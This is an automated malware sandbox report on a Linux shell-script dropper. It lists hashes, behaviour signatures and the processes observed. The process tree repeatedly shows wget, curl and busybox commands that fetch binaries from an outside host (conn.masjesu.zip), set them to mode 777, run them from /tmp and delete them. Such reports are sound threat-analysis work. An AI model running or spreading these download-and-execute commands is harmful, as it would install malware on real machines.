Analysis
-
max time kernel
82s -
max time network
83s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:24
Static task
static1
Behavioral task
behavioral1
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
-
Size
10KB
-
MD5
04d0449c41da21e91fcff668642e400d
-
SHA1
2a7724ac4a33aef57e864b4ab2ba41126ab9d3c0
-
SHA256
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764
-
SHA512
5c0f07e89ce67dfddfc6e90649fe73b20d8f460fd230aa8a787e68c8bafa8ac1acd949b497d7a0b0b55512ce9910ea9ea43bec6f80131074b11222c8fdab2094
-
SSDEEP
192:I5OQ49pUXvxwks6Pk+Y+k+j+2+e+Z7HTgG+HB6HTgGwNPk9pUXvfwks64+Y+k+j+:I5OQN6N+HB4wNPM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 891 chmod 954 chmod 961 chmod 1003 chmod 1031 chmod 771 chmod 790 chmod 905 chmod 940 chmod 1010 chmod 877 chmod 912 chmod 947 chmod 975 chmod 1024 chmod 968 chmod 982 chmod 989 chmod 1038 chmod 884 chmod 919 chmod 933 chmod 926 chmod 1017 chmod 830 chmod 867 chmod 898 chmod 996 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 772 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 792 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 832 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 868 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 878 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 885 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 892 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 899 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 906 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 913 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 920 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 927 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 934 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 941 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 948 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 955 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 962 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 969 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 976 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 983 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 990 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 997 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 1004 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 1011 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 1018 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 1025 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 1032 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 1039 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 946 busybox 950 wget 775 curl 932 busybox 974 busybox 774 wget 908 wget 909 curl 936 wget 965 curl 985 wget 1013 wget 929 wget 958 curl 1007 curl 1030 busybox 870 wget 876 busybox 887 wget 916 curl 925 busybox 972 curl 1000 curl 829 busybox 911 busybox 937 curl 883 busybox 951 curl 1034 wget 770 busybox 897 busybox 1014 curl 1020 wget 1021 curl 1037 busybox 764 curl 881 curl 944 curl 964 wget 967 busybox 981 busybox 1028 curl 874 curl 888 curl 918 busybox 957 wget 986 curl 988 busybox 1023 busybox 777 busybox 901 wget 904 busybox 930 curl 1002 busybox 1006 wget 894 wget 923 curl 890 busybox 902 curl 915 wget 1009 busybox 880 wget 895 curl 939 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl
Processes
-
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh1⤵PID:739
-
/bin/rm/bin/rm bins.sh2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:748
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:770
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:773
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:774
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:797
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:829
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:866
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:897
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:953
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:960
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:967
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972
-
-
